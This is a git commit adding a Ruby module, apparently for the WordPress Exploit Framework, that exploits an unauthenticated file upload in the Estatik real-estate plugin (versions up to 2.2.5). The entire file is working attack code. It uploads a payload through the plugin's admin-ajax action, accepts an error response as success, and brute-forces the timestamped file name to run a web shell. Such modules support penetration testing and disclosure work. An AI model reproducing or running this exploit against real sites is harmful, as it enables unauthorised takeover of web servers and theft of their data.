Add Estatik <= 2.2.5 shell upload

rastating · rastating · commit 14557a8a6510 · 2017-01-29T22:50:33.000Z
diff --git a/modules/exploits/estatik_v2.2.5_shell_upload.rb b/modules/exploits/estatik_v2.2.5_shell_upload.rb
@@ -0,0 +1,49 @@
+class Wpxf::Exploit::EstatikV225ShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Estatik <= 2.2.5 Unauthenticated Shell Upload',
+      author: [
+        'White Fir Design',               # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8593'],
+        ['URL', 'https://estatik.net/estatik-released-security-updates/']
+      ],
+      date: 'Aug 14 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('estatik', 'readme.txt', '2.3.0')
+  end
+
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+
+  def payload_body_builder
+    @start_timestamp = Time.now.to_i
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'es_prop_media_images')
+    builder.add_file_from_string('es_media_images[]', payload.encoded, payload_name)
+    builder
+  end
+
+  def expected_upload_response_code
+    500
+  end
+
+  def execute_payload(_payload_url)
+    @end_timestamp = Time.now.to_i
+    base_upload_uri = normalize_uri(wordpress_url_uploads, Time.now.strftime('%Y'), Time.now.strftime('%m'))
+
+    (@start_timestamp..@end_timestamp).each do |timestamp|
+      super(normalize_uri(base_upload_uri, "#{timestamp}_#{payload_name}"))
+    end
+  end
+end
